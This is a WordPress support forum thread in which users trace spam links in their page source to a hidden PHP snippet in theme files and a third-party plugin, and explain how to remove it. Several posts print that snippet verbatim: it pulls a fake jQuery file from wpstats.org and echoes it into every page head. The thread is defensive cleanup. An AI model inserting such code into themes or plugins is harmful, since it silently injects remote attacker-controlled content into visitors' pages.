WordPress.org

Forums

Un necessary care2.com links in my source file (25 posts)

  1. dineshmodi247
    Member
    Posted 3 years ago #

    Hello,
    My site is http://www.infiniteinnovations.net
    I was just looking at the source file and i found this

    [Code moderated as per the Forum Rules. Please use the pastebin]

    Mine is a web designing company site, i just dont understand where the links come form. Moreover these are adult tags and i wish to remove them at the earliest. I tried a lot of ways but i was not able to change the source file

    Question 2) How do i hide my wordpress info ? ( version , theme , etc )

    I am concerned with question 1 on top priority

    Kindly help

    Dinesh

  2. nusi
    Member
    Posted 3 years ago #

    I'd been interested about this too: I believe it's a hack and I don't understand how it happened. Someone else? I'm using wordpress 3.3.1 and I've tried to secure my page as good as possible (e.g. it's being monitored by WebsiteDefender.com). Pretty annoying ...

    thanks, stefan

  3. nusi
    Member
    Posted 3 years ago #

    I think I found something: I had a plugin called "WordPress Database Backup" (http://www.wordpressconnect.net/wordpress-database-backup-plugin/) installed. After deactivating it those nasty spam-links have now disappeared from the site's sourcecode.

  4. dineshmodi247
    Member
    Posted 3 years ago #

    ^ I uninstalled it .. Still I have the links

    I have the following plugins

    Askimet
    All in SEO
    Get the image
    Google XML Sitemaps
    Image Mouseover
    Login Lockdown
    Page Links to
    secure WordPress
    Sexybookmarks
    Superb Slideshow
    Super Simple Google Analytics
    WP Backup to dropbox
    copy protect
    minify
    smush.it
    super cache

    I wish to get those links removed at the earliest :(

  5. nusi
    Member
    Posted 3 years ago #

    Sexybookmarks???

    go to this forum's startpage, type care2.com into the search-field (right below "Search the Support Forums") - for me the second hit is a link to

    Sexybookmarks

    ... funny, isn't it? I can't say for sure it's this plugin that causes the troubles but I find it quite remarkable that the search yields a link to this particular plugin as second result (right after a link to your post).

    What I would do: deactivate all plugins. See if the links still are in the webpage's sourcode. If not, reactivate the plugins one after another. As soon as the links are back in the sourcode you know which plugin's causing the troubles.

    good luck, Stefan

  6. nusi
    Member
    Posted 3 years ago #

    the riddle's answer:

    it's not your blog that's been hacked nor is it my blog - wpstats.org has been hacked!

    have a look: http://www.wpstats.org/jquery-1.6.3.min.js (look at the source-code of that webpage)

    ... this doesn't look like jQuery, does it?

  7. dineshmodi247
    Member
    Posted 3 years ago #

    ^ watz the solution ?

    I want those adult links out of my code

  8. nusi
    Member
    Posted 3 years ago #

    kinda simple: make sure your wordpress-code doesn't link to http://www.wpstats.org/jquery-1.6.3.min.js
    very likely this will be the case within your plugins as they don't necessarily rely on the existence of jQuery within wordpress (don't know why - wordpress ships with jQuery anyway these days).

    an even better fix would be if the wordpress-team would fix wpstats.org but that might take some time...

  9. zero web
    Member
    Posted 3 years ago #

    I have found the problem.

    Check your installed theme "functions.php" for this line:

    if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url = "http://www.wpstats.org/jquery-1.6.3.min.js";$ch = curl_init();	$timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_theme');}

    For me, it was on line 3. Deleted the entire line, and...puff, no more sexy links in source code.

    Hope this helps, it took us some days of searching through the files....

  10. nusi
    Member
    Posted 3 years ago #

    just once again:

    the problem isn't the code in your or in my site - it's wordpress.org resp. http://www.wpstats.org/jquery-1.6.3.min.js

    and the wordpress people don't do anything about it :\

  11. zero web
    Member
    Posted 3 years ago #

    This is why I mentioned where the link to that file is, instead of waiting for someone else to fix this problem, I decided to fix it for myself. Google is indexing hidden divs, so...No more linked hacked scripts.

  12. nusi
    Member
    Posted 3 years ago #

    unfortunately it's not only there... it can possibly be found in the sources of hundreds of plugins and, as your example demonstrates, also themes. whoever hacked wpstats.org (can't believe it's been the wordpress-team itself) knew exactly about the consequences.

  13. nusi
    Member
    Posted 3 years ago #

    btw: does anybody know how to notify the wordpress-team. i already sent them a message about that over twitter but they didn't react. wpstats.org is in the current state for months now. don't they know the site is hacked or do they not care?

  14. and the wordpress people don't do anything about it :\

    wpstats.org is in the current state for months now. don't they know the site is hacked or do they not care?

    I don't think you mean what you think you mean.

    If the plugin you are referring to is hosted here and is doing dodgy things, please point out where that plugin is on http://wordpress.org/extend/plugins

    You haven't done that yet.

    This one doesn't have anything to do with WordPress despite the use of WordPress in their domain.

    http://www.wordpressconnect.net/wordpress-database-backup-plugin/

    That web site us doing something they must know they shouldn't be doing.

    http://wordpress.org/about/domains/

    If you can provide a link on WordPress.ORG for a plugin that's doing something dodgy, then that will make it easier to clean up.

    BTW wpstats.org doesn't look like it has anything to do with WordPress.

    http://www.networksolutions.com/whois-search/wpstats.org

  15. nusi
    Member
    Posted 3 years ago #

    ok, i see was probably wrong assuming wpstats.org belongs to wordpress.org - calling http://wpstats.org only forwards to http://wordpress.org.

    http://www.wordpressconnect.net/wordpress-database-backup-plugin/ is one of many plugins that links resp. embeds jQuery.js from http://www.wpstats.org/jquery-1.6.3.min.js (i've removed the call from the pugin's code manually).

    indeed, http://www.wordpressconnect.net/wordpress-database-backup-plugin/ doesn't seem to be listed on http://wordpress.org/extend/plugins - i only remember very vaguely i installed after it was recommended from my blog's dashboard (usually i'm looking for plugins on http://wordpress.org/extend/plugins and don't go searching the web over google or the like). maybe i should try to contact someone http://www.wordpressconnect.net ... anyway this isn't the only plugin resp. theme that links to wpstats.org...

  16. maybe i should try to contact someone

    You could attempt to contact them, but here's why I don't think that will get you anywhere.

    Their domain name contains "wordpress" in it. That's a huge no-no.

    But wait! There's more! Their logo is a fairly blatant spin on Amazon's logo.

    Those same folks have another plugin in the WordPress repository. That plugin sound like it's a little dodgy with embedding their own affiliate code into the plugin and having this explanation in the forum:

    I see not harm in adding my affiliate code, specially when the user do have the option to disable it in the backend.

    This may or may not be in the current version of the plugin, but it speaks volumes that they would consider making it opt-out instead of opt-in.

    I do not know if putting in their own affiliate code is permitted in the WordPress repository or if it's against the rules. But I do think it's questionable behavior.

    The fact that they also host a questionable plugin on their own site with dodgy code would make me avoid them and their software like the plague.

  17. nusi
    Member
    Posted 3 years ago #

    i've removed the wordpress-database-backup-plugin now...

  18. zero web
    Member
    Posted 3 years ago #

    so, this guys from wpstats.org have another copycat site >>> http://jquery.org

    with yet another script which loads links randomly in your site. Found another line of code in my theme functions.php which loaded some links in my site. Is there any way to report this domain names somewhere so they can be taken down? It i clearly they are loading malicious code without user consent, and I thing this is not legal?

  19. nusi
    Member
    Posted 3 years ago #

    interesting...

    whois tells me that jquery.org belongs to someone named "John Resig" - well, is it that John Resig who developed jQuery?
    https://en.wikipedia.org/wiki/John_Resig

  20. zero web
    Member
    Posted 3 years ago #

    They bought a domain name pretty similar to the original one http://www.jquerys.org (the original one is http://www.jquery.com and http://www.jquery.org), on the index file they have a redirect, so, if you try to get on site, you just get on the "legal" one, if you look into the code lines, the link is pretty similar to the "legal" one... and you just might pass the line without any concerns. The malicious file is hosted on the copycat server, the same with another js file with problems which I think is from the same guys, the http://www.wpstats.org server... What to do with this ones, I do not know, maybe just reporting those domains somewhere...I do not know if this is possible.

  21. kvshijo
    Member
    Posted 3 years ago #

    WOOW WORKIG

    zero web
    Member
    Posted 1 month ago #

    I have found the problem.

    Check your installed theme "functions.php" for this line:

    if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url = "http://www.wpstats.org/jquery-1.6.3.min.js";$ch = curl_init(); $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_theme');}
    For me, it was on line 3. Deleted the entire line, and...puff, no more sexy links in source code.

    Hope this helps, it took us some days of searching through the files....

  22. wolol0
    Member
    Posted 3 years ago #

    I have found the problem.

    Check your installed theme "functions.php" for this line:

    if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url = "http://www.wpstats.org/jquery-1.6.3.min.js";$ch = curl_init(); $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_theme');}
    For me, it was on line 3. Deleted the entire line, and...puff, no more sexy links in source code.

    Hope this helps, it took us some days of searching through the files....

    This is working.
    Thank you very much.

  23. zero web
    Member
    Posted 3 years ago #

    Glad I could help

  24. lennierv
    Member
    Posted 2 years ago #

    OMG thank you so much... saved me so much hassle :)

  25. rootdesignarg
    Member
    Posted 2 years ago #

    I did the following to solve this problem:
    I downloaded the theme folder (as the problem comes from it)
    I opened the notepad++ (freeware software)
    Click in search>search in files
    And when it says "folder" I entered as a path the folder of the theme ( this will make a specific search in a whole folder )
    I searched the name of the false jquery "jquery-1.6.3.min.js"
    and in my particular case, that was in \nameofthetheme\include\plugin\post.php

    I eliminated the external path and upload this file to ftp

    Problem solved!

    Hope it helps

    For any questions , mail me : javs.gtr@gmail.com

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags

No tags yet.